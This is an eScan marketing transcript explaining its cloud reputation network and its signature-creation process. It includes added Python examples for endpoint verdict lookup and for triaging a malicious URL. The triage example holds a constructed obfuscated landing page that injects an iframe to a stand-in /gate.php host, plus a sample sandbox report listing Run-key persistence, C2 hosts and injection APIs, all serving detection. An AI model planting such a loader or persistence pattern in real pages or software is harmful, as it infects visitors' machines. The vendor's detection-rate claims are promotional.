Transcript
Anti-Virus & Content Security
Cloud Protection Vs Traditional Security
www.escanav.com
[Diagram: Cloud Protection. Third-party subscribed services and the eScan Research Team share infected-file information with the eScan Security Network (ESN); ESN sorts files into good files and bad files; a live Internet connection is required. The four numbered steps in the diagram:]
1. Infected-file information is shared in real time by third-party services and the eScan Research Team with ESN.
2. The information is pushed to all eScan users worldwide through ESN in real time.
3. A virus signature is created.
4. eScan releases the signature every 2 hours.
We at eScan have developed a technology called eScan Security Network (ESN). ESN automatically analyzes, classifies, detects and quarantines 99.99% of the new malware discovered every day, keeping our clients protected in real time. When new malware appears, ESN responds promptly and with an advanced level of detection that provides superior protection. ESN not only detects and blocks unknown threats; it also prevents zero-day threats and phishing attempts.
This cloud-based network protects against current threats such as viruses, worms and Trojans, and identifies and blocks new threats before they become widespread.
The interaction has four phases:
1. Information on newly executed or downloaded applications is sent by third-party subscription services and the eScan Research Team to the eScan Security Network servers.
2. The files are checked and, if found malicious by the eScan Research Team or by a third-party service subscribed to by eScan, added to the eScan malware database. Legitimate files are added to the whitelisting database.
3. Information about newly discovered malicious and legitimate files becomes available to all users of the relevant eScan products within minutes of the initial detection.
4. A local application-whitelisting database of legitimate applications is built on each client and kept up to date.
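The client-side half of these phases, as an added Python example (not eScan's code): a local whitelist cache and a local signature set are consulted first, then the cloud, with a constructed in-memory stand-in for the ESN servers. All class, method and field names are assumptions, and the "files" are short constructed byte strings. It also models what the diagram's "Live Internet Connection Required" label implies: with no connection, a file that is neither whitelisted locally nor in the local signatures gets no cloud verdict.

```python
"""ESN-style verdict flow on an endpoint: local whitelist, local signatures,
then the cloud.

Added example, not eScan's code. It models the four phases above with an
in-memory stand-in for the ESN servers; class, method and field names are
assumptions, and the "files" are short constructed byte strings.
"""
import hashlib
from datetime import datetime, timedelta, timezone

GOOD, BAD, UNKNOWN = "good", "bad", "unknown"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


class CloudReputation:
    """Stand-in for the ESN servers: a hash -> verdict map that every
    endpoint queries live, so a verdict shared by a researcher or a
    third-party feed is visible to the very next lookup (phases 1 and 2)."""

    def __init__(self):
        self._verdicts = {}
        self.online = True  # flip to False to model a lost connection

    def report(self, sha256: str, verdict: str) -> None:
        self._verdicts[sha256] = verdict

    def lookup(self, sha256: str) -> str:
        if not self.online:
            raise ConnectionError("live Internet connection required")
        return self._verdicts.get(sha256, UNKNOWN)


class Endpoint:
    """The client side: consults local data first, then the cloud."""

    def __init__(self, cloud: CloudReputation, whitelist_ttl=timedelta(hours=2)):
        self.cloud = cloud
        self.signatures = set()   # SHA-256 of known-bad files (phases 3 and 4)
        self.whitelist = {}       # SHA-256 -> expiry of a cached "good" verdict
        self.whitelist_ttl = whitelist_ttl

    def apply_signature_release(self, released: set) -> None:
        """Phase 4: merge a periodic signature release and drop any cached
        'good' verdict it contradicts."""
        self.signatures |= released
        for h in released:
            self.whitelist.pop(h, None)

    def classify(self, data: bytes, now=None) -> tuple:
        """Return (verdict, source); source says which store decided."""
        now = now or datetime.now(timezone.utc)
        h = sha256_hex(data)
        if h in self.signatures:              # local signature wins over cache
            return BAD, "signature"
        expiry = self.whitelist.get(h)
        if expiry is not None and expiry > now:
            return GOOD, "whitelist"
        try:
            verdict = self.cloud.lookup(h)
        except ConnectionError:
            # Offline and no local knowledge: the cloud tier is unavailable,
            # so the file falls to signature/heuristic scanning only.
            return UNKNOWN, "offline"
        if verdict == GOOD:
            self.whitelist[h] = now + self.whitelist_ttl
        elif verdict == BAD:
            self.signatures.add(h)            # keep the block decision locally
            self.whitelist.pop(h, None)
        return verdict, "cloud"
```

One design choice worth noting: a cached "good" verdict is revoked as soon as a later signature release or cloud verdict contradicts it. A whitelist keyed only on a hash would otherwise keep trusting a file after it had been reclassified, for as long as the cache entry lived.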
eScan with Cloud Security is a security solution designed to provide real-time protection for computers against objectionable content and security threats such as viruses, spyware, adware, keyloggers, rootkits, botnets, hackers, spam and phishing.
Dependence on the Internet keeps growing, as the rising number of users who spend a large part of their time online shows. It has also brought an array of persistent, sophisticated and targeted cyber threats that increase the risk to your confidential information.
Detecting these threats before they harm your computing activities is therefore essential. eScan combines several advanced technologies for malware detection: signatures, heuristics and behavioral analysis. Its Web Protection and Anti-Spam modules block malicious websites and hacking attempts that try to steal banking credentials or private data from the user's computer, making online banking safer for the user. Virus signatures are created and delivered to users every two hours.
How it works: signature creation and release
[Flowchart: the sources from which samples are received are the eScan Research Team and eScan users. Each received sample is either a File or a URL.]
File: sandbox analysis records
A) which registry keys are added or modified;
B) which hosts and IP addresses are connected to;
C) which API calls and other methods are used to infect.
URL: decrypt the content and grab the resultant payload, then
A) check which CVE or exploit kit (EK) is being exploited;
B) check for any encryption or obfuscation routines used;
C) collect any other files used as payloads.
All resultant payloads are collected and the normal file algorithm is then applied to them.
* Signatures are created and pushed to all eScan customers.
Resultant Payload – the malicious content delivered by a landing page, for example JavaScript that loads a Java applet or a JAR file.
CVE – Common Vulnerabilities and Exposures, a dictionary of publicly known information-security vulnerabilities and exposures.
EK – Exploit Kit: a do-it-yourself malware kit sold on underground forums and used to deploy and manage malware botnets.
Obfuscation – transforming code (for example by encoding, packing or self-decoding layers) so that its original logic is hidden while it still runs.
Sandbox Analysis – an automated method of analyzing applications, executables, binaries or URLs in a controlled environment.
At eScan, an experienced team of virus analysts and developers works round the clock gathering information, evaluating new threats and responding rapidly to any virus outbreak anywhere in the world. Advanced technologies, complemented by skilled and experienced analysts and developers, let us analyze today's harmful computer viruses, create signatures for them and release the update immediately to our millions of users around the world. Over the years we have devised a methodical process for capturing virus incidents and responding to outbreaks as they happen, securing the computers of all eScan users. Our update delivery system, which consists of over ninety thousand update servers located throughout the world, brings user computers up to date within a very short time of the actual release.
The Process
eScan receives samples from several sources: samples submitted by eScan users, virus information gathered by our in-house team of analysts, and the eScan Security Network (eScan Cloud). The chart above gives an overview of how samples are received and analyzed and how virus signatures are created and released at eScan. A sample arrives either as a File or as a URL, and each kind follows its own analysis procedure before a signature is created and released to users.
When a malicious URL is received or captured, its content is usually encoded or encrypted; the analysts decode it and extract the resultant payload.
1. The payload is checked for the CVE or exploit kit being exploited.
2. It is then checked for any encryption or obfuscation routine that may have been used.
3. It is checked for other files that are used as payloads.
4. All resultant payloads are collected, and the normal file algorithm (File Analysis) is applied to them for further analysis and signature creation.
When a malicious file is received as a sample or extracted from a URL, it is analyzed by sandboxing and other procedures before a signature is created. The file is checked against the following criteria using in-house tools and processes:
1. The file is actually executed on a computer.
2. The modifications the execution makes to system files and to the registry are recorded.
3. The IP addresses the file connects to are recorded, along with whether further files are downloaded from those addresses and the protocol used for the download (FTP or HTTP).
4. Binary analysis of the file is done with in-house tools, using dynamic or static analysis as appropriate to the file. The file structure and code are analyzed, and the APIs being called are checked along with the methods used to call them.
This is the manual procedure, used whenever a sample escapes detection. Otherwise, all URLs and files are processed using the signatures created previously.
*Signature
*A signature is created on the basis of the entire analysis, and updates are released to users every two hours.
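The URL-to-signature path described above, as an added Python example (not eScan's tooling): it statically strips the String.fromCharCode() and unescape() layers from a constructed landing page to recover the payload URL, reads a constructed sandbox report for the registry, network and API indicators listed in the file procedure, and combines them with the payload hash into one signature record. The landing page, the report and its field names, the 203.0.113.x addresses (TEST-NET-3) and the payload bytes are all constructed for this example. No CVE or exploit-kit identification is attempted, since that needs a reference dataset the page does not provide.

```python
"""Triage of a malicious URL sample and its dropped payload.

Added example, not eScan's own tooling: it walks the URL -> payload ->
sandbox -> signature steps described on this page with constructed inputs.
The landing page, the sandbox report (and its field names) and the
203.0.113.x addresses (TEST-NET-3) are all constructed for this example.
"""
import hashlib
import re

# Constructed landing page: the payload URL is split across
# String.fromCharCode() and unescape(), then a percent-encoded
# document.write() is passed to eval().
LANDING_PAGE = (
    'var u=String.fromCharCode(104,116,116,112,58,47,47)'
    '+unescape("%32%30%33%2E%30%2E%31%31%33%2E%31%30%2F%67%61%74%65%2E%70%68%70");'
    'eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65'
    '%20%73%72%63%3D%27%2B%75%2B%27%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"));'
)

_UNESCAPE = re.compile(r'unescape\(\s*"([^"]*)"\s*\)')
_FROMCHARCODE = re.compile(r'String\.fromCharCode\(\s*([\d\s,]*)\)')
_CONCAT = re.compile(r'"\s*\+\s*"')          # "abc" + "def"  ->  "abcdef"
_URL = re.compile(r'https?://[^\s"\'<>]+')


def js_unescape(s: str) -> str:
    """Decode JavaScript unescape() input: %uXXXX first, then %XX."""
    s = re.sub(r'%u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r'%([0-9a-fA-F]{2})', lambda m: chr(int(m.group(1), 16)), s)


def deobfuscate(js: str, max_rounds: int = 5) -> str:
    """Statically strip the two encoding layers and join split string
    literals; repeat while anything changes, because kits nest encoders."""
    for _ in range(max_rounds):
        new = _UNESCAPE.sub(lambda m: '"' + js_unescape(m.group(1)) + '"', js)
        new = _FROMCHARCODE.sub(
            lambda m: '"' + ''.join(chr(int(n)) for n in m.group(1).split(',') if n.strip()) + '"',
            new)
        new = _CONCAT.sub('', new)
        if new == js:
            break
        js = new
    return js


def extract_urls(js: str) -> list:
    """URLs visible in the decoded script: the payload locations to fetch."""
    return sorted(set(_URL.findall(js)))


# Constructed sandbox report for the binary fetched from the landing URL.
SANDBOX_REPORT = {
    "registry": [
        {"op": "set", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\updater",
         "value": r"C:\Users\Public\upd.exe"},
        {"op": "set", "key": r"HKCU\Software\Example\LastRun", "value": "1"},
    ],
    "network": [
        {"proto": "http", "host": "203.0.113.10", "port": 80, "uri": "/gate.php"},
        {"proto": "ftp", "host": "203.0.113.11", "port": 21, "uri": "/upd.exe"},
    ],
    "api": ["InternetOpenUrlA", "CreateFileW", "WriteProcessMemory", "CreateRemoteThread"],
    "dropped": [r"C:\Users\Public\upd.exe"],
}

INJECTION_APIS = {"WriteProcessMemory", "CreateRemoteThread"}
RUN_KEY = "\\currentversion\\run\\"          # autostart location under HKCU/HKLM


def summarize_sandbox(report: dict) -> dict:
    """Pull out the indicators the file procedure lists: registry
    persistence, hosts contacted, download protocol, injection APIs, drops."""
    persistence = [r["key"] for r in report["registry"] if RUN_KEY in r["key"].lower()]
    c2 = sorted(f'{n["proto"]}://{n["host"]}:{n["port"]}{n["uri"]}' for n in report["network"])
    return {
        "persistence": persistence,
        "c2": c2,
        "download_channels": sorted({n["proto"] for n in report["network"]}),
        "injection": INJECTION_APIS.issubset(report["api"]),
        "dropped": list(report["dropped"]),
    }


def build_signature(payload: bytes, landing_page: str, report: dict) -> dict:
    """Combine the static indicators (hash, landing URLs) with the
    behavioural ones into a single signature record."""
    sig = {"sha256": hashlib.sha256(payload).hexdigest(),
           "landing_urls": extract_urls(deobfuscate(landing_page))}
    sig.update(summarize_sandbox(report))
    return sig


# Constructed stand-in for the dropped binary's bytes.
PAYLOAD = b"MZ\x90\x00constructed-sample-bytes"

if __name__ == "__main__":
    print(deobfuscate(LANDING_PAGE))
    print(build_signature(PAYLOAD, LANDING_PAGE, SANDBOX_REPORT))
```

The static decoder only handles encoders whose arguments are literals; once a kit computes its strings at run time, the analyst has to execute the script in an instrumented interpreter instead, which is the point at which the page's "sandbox analysis" step takes over from static decoding.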